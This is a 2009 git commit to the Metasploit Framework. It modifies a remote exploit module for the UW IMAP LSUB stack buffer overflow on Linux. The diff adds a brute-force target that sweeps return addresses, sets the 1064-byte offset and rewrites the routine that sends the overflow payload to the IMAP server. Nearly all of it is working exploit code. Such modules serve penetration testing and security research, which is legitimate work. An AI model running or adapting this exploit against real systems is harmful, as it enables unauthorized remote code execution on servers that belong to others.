reinstated linux bruteforce target from msf2 exploit

git-svn-id: file:///home/svn/framework3/trunk@8025 4d416f70-5f16-0410-b530-b9f4589650da
2009-12-29 22:57:02 +00:00 · 2009-12-29 22:57:02 +00:00 · 48c2184fb2
parent 036ac8fb90
commit 48c2184fb2
2 changed files with 24 additions and 17 deletions
--- a/documentation/metasploit2/exploits.txt
+++ b/documentation/metasploit2/exploits.txt
@ -17,7 +17,7 @@ Unfinished modules
 	sybase_easerver
 	sygate_policy_manager
 	uow_imap4_copy
-	uow_imap4_lsub
+	uow_imap4_lsub - partially (linux/imap/imap_uw_lsub.rb)
 	wzdftpd_sitem


--- a/modules/exploits/linux/imap/imap_uw_lsub.rb
+++ b/modules/exploits/linux/imap/imap_uw_lsub.rb
@ -16,6 +16,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GoodRanking

+	include Msf::Exploit::Brute
 	include Msf::Exploit::Remote::Imap

 	def initialize(info = {})
@ -41,17 +42,25 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Payload'        =>
 				{
 					'Space'    => 964,
-					'BadChars' => "\x00\x0a\x0d",
+					'BadChars' => "\x00\x0a\x0d\x2f",
 					'StackAdjustment' => -3500,
-					'Compat'   => 
-						{
-							'ConnectionType' => '-reverse',
-						},
 				},
 			'Platform'       => 'linux',	
 			'Targets'        => 
 				[
-					['RedHat 6.2 - IMAP4rev1 v12.264', { 'Ret' => 0xbffff310 }],
+					# ['RedHat 6.2 - IMAP4rev1 v12.264', { 'Ret' => 0xbffff310 }],
+					[ 'Linux Bruteforce',
+						{ 
+							'Platform'   => 'linux',
+							'Offset'     => 1064,
+							'Bruteforce' => 
+								{
+									'Start' => { 'Ret' => 0xbffffdfc },
+									'Stop'  => { 'Ret' => 0xbfa00000 },
+									'Step'  => 200
+								}
+						}, 
+					]
 				],
 			'DisclosureDate' => 'Apr 16 2000',
 			'DefaultTarget' => 0))
@ -68,19 +77,17 @@ class Metasploit3 < Msf::Exploit::Remote

 	end

-	def exploit
+	def brute_exploit(addresses)
+		print_status("Trying 0x%.8x ..." % addresses['Ret'])
+		
 		connect_login
-
-		print_status("Sending overflow string...")
-		req = "a002 LSUB \"\" {1064}\r\n"
+		req = "a002 LSUB \"\" {%d}\r\n" % target['Offset']
 		sock.put(req)
-		sleep(2)
-
-		sploit = payload.encoded + rand_text_alphanumeric(64) + [target['Ret']].pack('V') + rand_text_alphanumeric(32) + "\r\n"
-
+		buf = sock.get_once
+		
+		sploit = payload.encoded + rand_text_alphanumeric(64) + [addresses['Ret']].pack('V') + rand_text_alphanumeric(32) + "\r\n"
 		sock.put(sploit)
-		sleep(2)
-
+		
 		handler
 		disconnect
 	end